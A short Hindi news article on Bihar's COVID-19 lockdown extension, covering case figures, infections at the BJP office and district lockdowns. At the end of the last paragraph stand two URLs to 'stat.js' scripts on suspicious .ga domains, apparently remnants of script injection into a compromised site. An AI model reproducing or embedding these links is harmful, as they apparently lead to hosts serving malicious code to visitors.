बिहार सरकार से अभी अभी बड़ा फैसला लिया है, कोरोना के बढ़ते मामलों को देखते हुए नीतीश सरकार ने फिर लॉकडाउन बढ़ाने का फैसला किया है. बिहार के सभी जिला मुख्यालय अनुमंडल और ब्लॉक मुख्यालय में 16 से 31 जुलाई तक लॉकडाउन रहेगा. इस दौरान रेलवे और विमान सेवा जारी रहेंगी. वहीं, शॉपिंग मॉल, धार्मिक स्थल, सार्वजनिक परिवहन बंद रहेंगे।

इससे पहले पटना में 10 से 16 जुलाई तक के लिए संपूर्ण लॉकडाउन घोषित किया गया था. इधर, बताया जा रहा है कि बिहार गृह विभाग के अपर मुख्य सचिव की कोरोना रिपोर्ट पॉजिटिव आई है।

वहीं, बिहार में कुल मरीजों का आंकड़ा 18 हजार के करीब है. इस वायरस की चपेट में आकर अब तक 160 लोगों की मौत हो चुकी है. राहत की बात है कि अब तक 12 हजार 317 लोग ठीक हो चुके हैं. प्रदेश में एक्टिव केस की संख्या 5482 है।

बिहार में बढ़ते कोरोना मामलों को लेकर विपक्ष भी हमलावर है. नीतीश कुमार के नेतृत्व वाली राष्ट्रीय जनतांत्रिक गठबंधन (एनडीए) सरकार में गठबंधन सहयोगी भारतीय जनता पार्टी (भाजपा) के कार्यालय में भी कोरोना ने दस्तक दे दी है. बीजेपी कार्यालय के नेता, स्टाफ समेत कुल 75 लोग कोरोना से संक्रमित हो चुके हैं।

मुख्य सचिव दीपक कुमार ने सोमवार को कहा कि पूरे राज्य में लॉकडाउन लगाने पर मंगलवार को निर्णय लिया जाएगा। गौरतलब हो कि राज्य में पटना समेत कई जिलों में लागू लॉकडाउन को और व्यापक रूप दिए जाने की सरकार की तैयारी है, ताकि संक्रमण की चेन को तोड़ने के साथ ही इसके प्रसार को भी रोका जा सके। ज्ञात हो कि बिहार समेत पूरे देश में 24 मार्च की रात से 31 मई तक पूर्ण लॉकडाउन रहा। इसके बाद जून में अनलॉक-1 और फिर जुलाई में अनलॉक-2 लागू हुआ है।

कहिटार जिले में कोरोना संक्रमितों की संख्या बढ़ने के कारण जिलाधिकारी कंवल तनुज ने 14 से 20 जुलाई तक लॉकडाउन की घोषणा की है। लखीसराय में सोमवार से लॉकडाउन लागू कर दिया गया है। अगले एक सप्ताह 19 जुलाई तक जिले के विभिन्न हिस्सों में लॉकडाउन जारी रहेगा।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.